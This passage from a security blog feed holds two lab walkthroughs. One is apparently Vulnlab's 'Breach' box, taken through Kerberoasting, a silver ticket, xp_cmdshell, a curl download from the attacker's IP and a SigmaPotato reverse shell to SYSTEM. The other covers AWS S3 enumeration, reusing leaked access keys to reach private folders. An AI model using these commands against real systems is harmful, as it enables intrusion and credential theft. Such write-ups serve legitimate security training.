10:36:12</span><br><span class="line">[!] Username: Hugh.Watts               Password last change: 985 days ago 2022-02-17 10:36:12</span><br><span class="line">[!] Username: Christine.Bruce          Password last change: 985 days ago 2022-02-17 10:36:12</span><br><span class="line">[!] Username: svc_mssql                Password last change: 985 days ago 2022-02-17 10:43:08</span><br><span class="line"></span><br><span class="line">[-] Users with an interesting description</span><br><span class="line">[!] No entry found !</span><br><span class="line"></span><br><span class="line">[-] Users with not the default encryption</span><br><span class="line">[*] Username: krbtgt                   Password is <span class="keyword">in</span> a reversible encryption or <span class="keyword">in</span> DES !</span><br><span class="line"></span><br><span class="line">[-] Protecting Privileged Domain Accounts</span><br><span class="line">[!] No entry found !</span><br><span class="line"></span><br><span class="line">[-] Not Default Attributes (TEST IN BETA)</span><br><span class="line"></span><br><span class="line">[!] No entry found !</span><br><span class="line"></span><br><span class="line">[-] Laps Password</span><br><span class="line">[!] No entry found !</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">====================================================</span><br><span class="line">==================== Attack AD =====================</span><br><span class="line">====================================================</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">[-] AS-REP Roastable Users</span><br><span class="line">[!] No entry found !</span><br><span class="line"></span><br><span class="line">[-] Kerberoastable Users</span><br><span class="line">[*] Username: svc_mssql                CN=svc_mssql,CN=Users,DC=breach,DC=vl</span><br><span class="line">[+] Hash added to file:                kerbHash.<span class="built_in">hash</span></span><br><span class="line"></span><br><span class="line">[-] Starting to crack hashs</span><br><span class="line">[!] No entry found !</span><br><span class="line"></span><br><span class="line">➜  Breach </span><br></pre></td></tr></table></figure></div><p>Found that <code>svc_mssql</code> account is Kerberoastable. With the hash we got from ADEnum i used john to crack the hash.</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">➜  Breach john kerbHash.<span class="built_in">hash</span> --wordlist=/usr/share/wordlists/rockyou.txt </span><br><span class="line">Using default input encoding: UTF-8</span><br><span class="line">Loaded 1 password <span class="built_in">hash</span> (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])</span><br><span class="line">Will run 4 OpenMP threads</span><br><span class="line">Press <span class="string">&#x27;q&#x27;</span> or Ctrl-C to abort, almost any other key <span class="keyword">for</span> status</span><br><span class="line">[...]         (?)     </span><br><span class="line">1g 0:00:00:00 DONE (2024-10-30 08:05) 33.33g/s 1740Kp/s 1740Kc/s 1740KC/s chloelouise..lili12</span><br><span class="line">Use the <span class="string">&quot;--show&quot;</span> option to display all of the cracked passwords reliably</span><br><span class="line">Session completed. </span><br><span class="line">➜  Breach </span><br></pre></td></tr></table></figure></div><p>So with this password and username we can get access to mssql, so i generated a silver ticket using ticketer to make a ticket and access msssql.</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">➜  Breach ticketer.py -nthash 69596C7AA1E81AEE14F8E78870E21A5C -spn svc_mssql/BREACH.VL -domain BREACH.VL -domain-sid S-1-5-21-2330692793-3312915120-706225856 administrator   </span><br><span class="line">Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies </span><br><span class="line">[*] Creating basic skeleton ticket and PAC Infos</span><br><span class="line">[*] Customizing ticket <span class="keyword">for</span> BREACH.VL/administrator</span><br><span class="line">[*]     PAC_LOGON_INFO</span><br><span class="line">[*]     PAC_CLIENT_INFO_TYPE</span><br><span class="line">[*]     EncTicketPart</span><br><span class="line">[*]     EncAsRepPart</span><br><span class="line">[*] Signing/Encrypting final ticket</span><br><span class="line">[*]     PAC_SERVER_CHECKSUM</span><br><span class="line">[*]     PAC_PRIVSVR_CHECKSUM</span><br><span class="line">[*]     EncTicketPart</span><br><span class="line">[*]     EncASRepPart</span><br><span class="line">[*] Saving ticket <span class="keyword">in</span> administrator.ccache</span><br><span class="line">➜  Breach <span class="built_in">export</span> KRB5CCNAME=administrator.ccache</span><br></pre></td></tr></table></figure></div><p>After ticket generation i exported it and accessed to mssql using that ticket.</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">➜  Breach impacket-mssqlclient breach.vl -target-ip 10.10.91.44 -windows-auth -k </span><br><span class="line">Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies </span><br><span class="line"></span><br><span class="line">[*] Encryption required, switching to TLS</span><br><span class="line">[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master</span><br><span class="line">[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english</span><br><span class="line">[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192</span><br><span class="line">[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed database context to <span class="string">&#x27;master&#x27;</span>.</span><br><span class="line">[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed language setting to us_english.</span><br><span class="line">[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) </span><br><span class="line">[!] Press <span class="built_in">help</span> <span class="keyword">for</span> extra shell commands</span><br><span class="line">SQL (BREACH\Administrator  dbo@master)&gt; enable_xp_cmdshell</span><br><span class="line">INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option <span class="string">&#x27;show advanced options&#x27;</span> changed from 0 to 1. Run the RECONFIGURE statement to install.</span><br><span class="line">INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option <span class="string">&#x27;xp_cmdshell&#x27;</span> changed from 0 to 1. Run the RECONFIGURE statement to install.</span><br><span class="line">SQL (BREACH\Administrator  dbo@master)&gt; </span><br></pre></td></tr></table></figure></div><p>I was able to use <code>enable_xp_cmdshell</code> command inside mssql</p><p>After checking privileges i found <code>svc_mssql</code> has SeImpersonatePrivilege, so we can use sigma potato to get a shell as administrator. </p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line">SQL (BREACH\Administrator  dbo@master)&gt; xp_cmdshell <span class="built_in">whoami</span></span><br><span class="line">output             </span><br><span class="line">----------------   </span><br><span class="line">breach\svc_mssql   </span><br><span class="line"></span><br><span class="line">NULL               </span><br><span class="line"></span><br><span class="line">SQL (BREACH\Administrator  dbo@master)&gt; </span><br><span class="line">SQL (BREACH\Administrator  dbo@master)&gt; xp_cmdshell <span class="built_in">whoami</span> /priv</span><br><span class="line">output                                                                             </span><br><span class="line">--------------------------------------------------------------------------------   </span><br><span class="line">NULL                                                                               </span><br><span class="line"></span><br><span class="line">PRIVILEGES INFORMATION                                                             </span><br><span class="line"></span><br><span class="line">----------------------                                                             </span><br><span class="line"></span><br><span class="line">NULL                                                                               </span><br><span class="line"></span><br><span class="line">Privilege Name                Description                               State      </span><br><span class="line"></span><br><span class="line">============================= ========================================= ========   </span><br><span class="line"></span><br><span class="line">SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled   </span><br><span class="line"></span><br><span class="line">SeIncreaseQuotaPrivilege      Adjust memory quotas <span class="keyword">for</span> a process        Disabled   </span><br><span class="line"></span><br><span class="line">SeMachineAccountPrivilege     Add workstations to domain                Disabled   </span><br><span class="line"></span><br><span class="line">SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled    </span><br><span class="line"></span><br><span class="line">SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled    </span><br><span class="line"></span><br><span class="line">SeImpersonatePrivilege        Impersonate a client after authentication Enabled    </span><br><span class="line"></span><br><span class="line">SeCreateGlobalPrivilege       Create global objects                     Enabled    </span><br><span class="line"></span><br><span class="line">SeIncreaseWorkingSetPrivilege Increase a process working <span class="built_in">set</span>            Disabled   </span><br><span class="line"></span><br><span class="line">NULL                                                                               </span><br><span class="line"></span><br><span class="line">SQL (BREACH\Administrator  dbo@master)&gt; </span><br></pre></td></tr></table></figure></div><h4 id="Privilege-Escalation"><a href="#Privilege-Escalation" class="headerlink" title="Privilege Escalation"></a>Privilege Escalation</h4><p>I uploaded sigma potato and got a reverse shell in my kali.</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">SQL (BREACH\Administrator  dbo@master)&gt; xp_cmdshell curl http://10.8.3.249:1337/sig.exe.exe -o C:\ProgramData\\sig.exe</span><br><span class="line">output                                                                             </span><br><span class="line">--------------------------------------------------------------------------------   </span><br><span class="line">  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current    </span><br><span class="line"></span><br><span class="line">                                 Dload  Upload   Total   Spent    Left  Speed      </span><br><span class="line"></span><br><span class="line">100 57344  100 57344    0     0  86360      0 --:--:-- --:--:-- --:--:-- 86361   </span><br><span class="line"></span><br><span class="line">NULL                                                                               </span><br><span class="line"></span><br><span class="line">SQL (BREACH\Administrator  dbo@master)&gt; </span><br><span class="line">SQL (BREACH\Administrator  dbo@master)&gt; xp_cmdshell C:\ProgramData\sig.exe --revshell 10.8.3.249 443</span><br></pre></td></tr></table></figure></div><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">➜  Breach nc -nvlp 443</span><br><span class="line">Listening on 0.0.0.0 443</span><br><span class="line">Connection received on 10.10.91.44 61353</span><br><span class="line">PS C:\Windows\system32&gt; <span class="built_in">whoami</span></span><br><span class="line">nt authority\system</span><br><span class="line">PS C:\Windows\system32&gt; </span><br></pre></td></tr></table></figure></div><p>We successfully obtained a shell with Administrator privileges.</p>]]></content>
    
    
      
      
    <summary type="html">&lt;link rel=&quot;stylesheet&quot; class=&quot;aplayer-secondary-style-marker&quot; href=&quot;/assets/css/APlayer.min.css&quot;&gt;&lt;script src=&quot;/assets/js/APlayer.min.js&quot; cla</summary>
      
    
    
    
    <category term="Vulnlab" scheme="http://example.com/categories/Vulnlab/"/>
    
    
    <category term="Active Directory" scheme="http://example.com/tags/Active-Directory/"/>
    
    <category term="Vulnlab" scheme="http://example.com/tags/Vulnlab/"/>
    
    <category term="MSSql" scheme="http://example.com/tags/MSSql/"/>
    
    <category term="Netexec" scheme="http://example.com/tags/Netexec/"/>
    
    <category term="Silver Ticket" scheme="http://example.com/tags/Silver-Ticket/"/>
    
  </entry>
  
  <entry>
    <title>AWS S3 Enumeration</title>
    <link href="http://example.com/2024/11/03/AWS-S3-Enumeration/"/>
    <id>http://example.com/2024/11/03/AWS-S3-Enumeration/</id>
    <published>2024-11-03T06:44:00.000Z</published>
    <updated>2026-06-06T09:05:49.871Z</updated>
    
    <content type="html"><![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="/assets/css/APlayer.min.css"><script src="/assets/js/APlayer.min.js" class="aplayer-secondary-script-marker"></script><h3 id="Scenario"><a href="#Scenario" class="headerlink" title="Scenario"></a>Scenario</h3><p>It’s your first day on the red team, and you’ve been tasked with examining a website that was found in a phished employee’s bookmarks. Check it out and see where it leads! In scope is the company’s infrastructure, including cloud services.</p><h3 id="Lab-prerequisites"><a href="#Lab-prerequisites" class="headerlink" title="Lab prerequisites"></a>Lab prerequisites</h3><p>Basic Linux command line knowledge<br>AWS cli installed in your linux, if not check out this post <a class="link"   href="https://0xsebin-blogs.vercel.app/2024/11/01/AWS-CLI-installation/" >AWS cli installation<i class="fa-solid fa-arrow-up-right ml-[0.2em] font-light align-text-top text-[0.7em] link-icon"></i></a></p><h3 id="Familiarity-with-the-AWS-CLI"><a href="#Familiarity-with-the-AWS-CLI" class="headerlink" title="Familiarity with the AWS CLI"></a>Familiarity with the AWS CLI</h3><p>Basic S3 enumeration and credential exfiltration<br>An awareness of how this scenario could be been prevented</p><h3 id="Difficulty"><a href="#Difficulty" class="headerlink" title="Difficulty"></a>Difficulty</h3><p>Beginner</p><h3 id="Focus"><a href="#Focus" class="headerlink" title="Focus"></a>Focus</h3><p>Red</p><h3 id="Real-world-context"><a href="#Real-world-context" class="headerlink" title="Real-world context"></a>Real-world context</h3><p>Amazon S3 (Simple Storage Service) is a very popular (and the second oldest!) AWS service that is used to store files and backups, and can even be used to serve websites. This multi-use functionality has led some to argue that this service would be more secure if it were split into separate public web hosting and private file storage services. In recent years AWS have introduced more visual warnings when customers are making buckets world-readable, but still, if this setting is available, people will set it! Misconfigurations and overly permissive settings in S3 have resulted in many data breaches over the years.</p><h3 id="Walkthrough"><a href="#Walkthrough" class="headerlink" title="Walkthrough"></a>Walkthrough</h3><p>We were given a URL to start our enumeration: <code>http://dev.huge-logistics.com</code>.<br>Its nothing but a normal webpage<br><img                       lazyload                     src="/images/loading.svg"                     data-src="/assets/Pwnedlabs/AWS-S3-Enumeration/index.png"                                     ></p><p>After inspecting the page source, we noticed it was hosted on an S3 bucket.<br><img                       lazyload                     src="/images/loading.svg"                     data-src="/assets/Pwnedlabs/AWS-S3-Enumeration/source-page.png"                                     ></p><p><img                       lazyload                     src="/images/loading.svg"                     data-src="/assets/Pwnedlabs/AWS-S3-Enumeration/S3.png"                                     ></p><p>We used the AWS CLI for further enumeration.</p><h4 id="S3-Enumeration"><a href="#S3-Enumeration" class="headerlink" title="S3 Enumeration"></a>S3 Enumeration</h4><p>First, we attempted to list the bucket contents:</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">➜  S3 enumeration aws s3 ls s3://dev.huge-logistics.com</span><br><span class="line">Unable to locate credentials. You can configure credentials by running &quot;aws configure&quot;.</span><br><span class="line">➜  S3 enumeration</span><br></pre></td></tr></table></figure></div><p>Since credentials were missing, it returned an error. We retried with the <code>--no-sign-request</code> option to check for public access<br>The bucket allowed access, displaying several directories:</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">➜  S3 enumeration aws s3 ls s3://dev.huge-logistics.com --no-sign-request</span><br><span class="line">                           PRE admin/</span><br><span class="line">                           PRE migration-files/</span><br><span class="line">                           PRE shared/</span><br><span class="line">                           PRE static/</span><br><span class="line">2023-10-16 22:30:47       5347 index.html</span><br><span class="line">➜  S3 enumeration</span><br></pre></td></tr></table></figure></div><p>The bucket was publicly accessible and contained several directories. We can try to check each folder and files.</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">➜  S3 enumeration aws s3 ls s3://dev.huge-logistics.com/admin --no-sign-request</span><br><span class="line"></span><br><span class="line">An error occurred (AccessDenied) when calling the ListObjectsV2 operation: Access Denied</span><br><span class="line">➜  S3 enumeration aws s3 ls s3://dev.huge-logistics.com/migration-files/ --no-sign-request</span><br><span class="line"></span><br><span class="line">An error occurred (AccessDenied) when calling the ListObjectsV2 operation: Access Denied</span><br><span class="line">➜  S3 enumeration aws s3 ls s3://dev.huge-logistics.com/shared/ --no-sign-request</span><br><span class="line">2023-10-16 20:38:33          0</span><br><span class="line">2023-10-16 20:39:01        993 hl_migration_project.zip</span><br><span class="line">➜  S3 enumeration aws s3 ls s3://dev.huge-logistics.com/shared/static/ --no-sign-request</span><br><span class="line"></span><br><span class="line">An error occurred (AccessDenied) when calling the ListObjectsV2 operation: Access Denied</span><br><span class="line">➜  S3 enumeration</span><br></pre></td></tr></table></figure></div><p>Only the shared folder was accessible, containing a file named <code>hl_migration_project.zip</code>. We downloaded it:</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">➜  S3 enumeration aws s3 ls s3://dev.huge-logistics.com/shared/ --no-sign-request</span><br><span class="line">2023-10-16 20:38:33          0</span><br><span class="line">2023-10-16 20:39:01        993 hl_migration_project.zip</span><br><span class="line">➜  S3 enumeration aws s3 ls s3://dev.huge-logistics.com/shared/static/ --no-sign-request</span><br><span class="line"></span><br><span class="line">An error occurred (AccessDenied) when calling the ListObjectsV2 operation: Access Denied</span><br><span class="line">➜  S3 enumeration aws s3 cp s3://dev.huge-logistics.com/shared/hl_migration_project.zip ./ --no-sign-request</span><br><span class="line">download: s3://dev.huge-logistics.com/shared/hl_migration_project.zip to ./hl_migration_project.zip</span><br><span class="line">➜  S3 enumeration ls</span><br><span class="line">hl_migration_project.zip</span><br><span class="line">➜  S3 enumeration unzip hl_migration_project.zip</span><br><span class="line">Archive:  hl_migration_project.zip</span><br><span class="line">  inflating: migrate_secrets.ps1</span><br><span class="line">➜  S3 enumeration cat migrate_secrets.ps1</span><br></pre></td></tr></table></figure></div><div class="code-container" data-rel="Powershell"><figure class="iseeu highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># AWS Configuration</span></span><br><span class="line"><span class="variable">$accessKey</span> = <span class="string">&quot;AKIA3S[____]XEHU&quot;</span></span><br><span class="line"><span class="variable">$secretKey</span> = <span class="string">&quot;MwGe3[____]X/gb9&quot;</span></span><br><span class="line"><span class="variable">$region</span> = <span class="string">&quot;us-east-1&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># Set up AWS hardcoded credentials</span></span><br><span class="line"><span class="built_in">Set-AWSCredentials</span> <span class="literal">-AccessKey</span> <span class="variable">$accessKey</span> <span class="literal">-SecretKey</span> <span class="variable">$secretKey</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># Set the AWS region</span></span><br><span class="line"><span class="built_in">Set-DefaultAWSRegion</span> <span class="literal">-Region</span> <span class="variable">$region</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># Read the secrets from export.xml</span></span><br><span class="line">[<span class="built_in">xml</span>]<span class="variable">$xmlContent</span> = <span class="built_in">Get-Content</span> <span class="literal">-Path</span> <span class="string">&quot;export.xml&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># Output log file</span></span><br><span class="line"><span class="variable">$logFile</span> = <span class="string">&quot;upload_log.txt&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># Error handling with retry logic</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">TryUploadSecret</span><span class="params">(<span class="variable">$secretName</span>, <span class="variable">$secretValue</span>)</span></span> &#123;</span><br><span class="line">    <span class="variable">$retries</span> = <span class="number">3</span></span><br><span class="line">    <span class="keyword">while</span> (<span class="variable">$retries</span> <span class="operator">-gt</span> <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            <span class="variable">$result</span> = <span class="built_in">New-SECSecret</span> <span class="literal">-Name</span> <span class="variable">$secretName</span> <span class="literal">-SecretString</span> <span class="variable">$secretValue</span></span><br><span class="line">            <span class="variable">$logEntry</span> = <span class="string">&quot;Successfully uploaded secret: <span class="variable">$secretName</span> with ARN: <span class="variable">$</span>(<span class="variable">$result</span>.ARN)&quot;</span></span><br><span class="line">            <span class="built_in">Write-Output</span> <span class="variable">$logEntry</span></span><br><span class="line">            <span class="built_in">Add-Content</span> <span class="literal">-Path</span> <span class="variable">$logFile</span> <span class="literal">-Value</span> <span class="variable">$logEntry</span></span><br><span class="line">            <span class="keyword">return</span> <span class="variable">$true</span></span><br><span class="line">        &#125; <span class="keyword">catch</span> &#123;</span><br><span class="line">            <span class="variable">$retries</span><span class="literal">--</span></span><br><span class="line">            <span class="built_in">Write-Error</span> <span class="string">&quot;Failed attempt to upload secret: <span class="variable">$secretName</span>. Retries left: <span class="variable">$retries</span>. Error: <span class="variable">$_</span>&quot;</span></span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="variable">$false</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">foreach</span> (<span class="variable">$secretNode</span> <span class="keyword">in</span> <span class="variable">$xmlContent</span>.Secrets.Secret) &#123;</span><br><span class="line">    <span class="comment"># Implementing concurrency using jobs</span></span><br><span class="line">    <span class="built_in">Start-Job</span> <span class="literal">-ScriptBlock</span> &#123;</span><br><span class="line">        <span class="keyword">param</span>(<span class="variable">$secretName</span>, <span class="variable">$secretValue</span>)</span><br><span class="line">        TryUploadSecret <span class="literal">-secretName</span> <span class="variable">$secretName</span> <span class="literal">-secretValue</span> <span class="variable">$secretValue</span></span><br><span class="line">    &#125; <span class="literal">-ArgumentList</span> <span class="variable">$secretNode</span>.Name, <span class="variable">$secretNode</span>.Value</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment"># Wait for all jobs to finish</span></span><br><span class="line"><span class="variable">$jobs</span> = <span class="built_in">Get-Job</span></span><br><span class="line"><span class="variable">$jobs</span> | <span class="built_in">Wait-Job</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># Retrieve and display job results</span></span><br><span class="line"><span class="variable">$jobs</span> | <span class="built_in">ForEach-Object</span> &#123;</span><br><span class="line">    <span class="variable">$result</span> = <span class="built_in">Receive-Job</span> <span class="literal">-Job</span> <span class="variable">$_</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="operator">-not</span> <span class="variable">$result</span>) &#123;</span><br><span class="line">        <span class="built_in">Write-Error</span> <span class="string">&quot;Failed to upload secret: <span class="variable">$</span>(<span class="variable">$_</span>.Name) after multiple retries.&quot;</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment"># Clean up the job</span></span><br><span class="line">    <span class="built_in">Remove-Job</span> <span class="literal">-Job</span> <span class="variable">$_</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="built_in">Write-Output</span> <span class="string">&quot;Batch upload complete!&quot;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># Install-Module -Name AWSPowerShell -Scope CurrentUser -Force</span></span><br><span class="line"><span class="comment"># .\migrate_secrets.ps1%</span></span><br><span class="line">➜  S3 enumeration</span><br></pre></td></tr></table></figure></div><p>Inside the ZIP file, we found migrate_secrets.ps1 containing an AWS access key and secret key. We configured the credentials and checked their validity:</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">➜  S3 enumeration aws configure --profile s3-enum</span><br><span class="line">AWS Access Key ID [None]: AKIA3S[____]XEHU</span><br><span class="line">AWS Secret Access Key [None]: MwGe3[____]X/gb9</span><br><span class="line">Default region name [None]: us-east-1</span><br><span class="line">Default output format [None]:</span><br><span class="line">➜  S3                                                                                                                                 </span><br></pre></td></tr></table></figure></div><p>This provided us additional access:</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">➜  S3 enumeration aws sts get-caller-identity --profile s3-enum</span><br><span class="line">&#123;</span><br><span class="line">    &quot;UserId&quot;: &quot;AIDA3SFMDAPOYPM3X2TB7&quot;,</span><br><span class="line">    &quot;Account&quot;: &quot;794929857501&quot;,</span><br><span class="line">    &quot;Arn&quot;: &quot;arn:aws:iam::794929857501:user/pam-test&quot;</span><br><span class="line">&#125;</span><br><span class="line">➜  S3 enumeration</span><br></pre></td></tr></table></figure></div><p>With this, we accessed previously restricted directories, including admin and migration-files.</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">➜  S3 enumeration aws s3 ls s3://dev.huge-logistics.com/admin --profile s3-enum</span><br><span class="line">                           PRE admin/</span><br><span class="line">➜  S3 enumeration aws s3 ls s3://dev.huge-logistics.com/migration-files/ --profile s3-enum</span><br><span class="line">2023-10-16 20:38:47          0</span><br><span class="line">2023-10-16 20:39:26    1833646 AWS Secrets Manager Migration - Discovery &amp; Design.pdf</span><br><span class="line">2023-10-16 20:39:25    1407180 AWS Secrets Manager Migration - Implementation.pdf</span><br><span class="line">2023-10-16 20:39:27       1853 migrate_secrets.ps1</span><br><span class="line">2023-10-16 23:30:13       2494 test-export.xml</span><br><span class="line">➜  S3 enumeration aws s3 cp s3://dev.huge-logistics.com/migration-files/migrate_secrets.ps1 ./ --profile s3-enum</span><br><span class="line">download: s3://dev.huge-logistics.com/migration-files/migrate_secrets.ps1 to ./migrate_secrets.ps1</span><br><span class="line">➜  S3 enumeration aws s3 cp s3://dev.huge-logistics.com/migration-files/test-export.xml ./ --profile s3-enum</span><br><span class="line">download: s3://dev.huge-logistics.com/migration-files/test-export.xml to ./test-export.xml</span><br><span class="line">➜  S3 enumeration</span><br></pre></td></tr></table></figure></div><p>We copied both <code>migrate_secrets.ps1</code> and <code>test-export.xml</code> file to our machine and checked, <code>migrate_secrets.ps1</code> is the same old file which we got before. In <code>test-export.xml</code> we got <code>AWS IT Admin</code>‘s secret and access keys which we can use to access admin directory.</p><div class="code-container" data-rel="Xml"><figure class="iseeu highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span 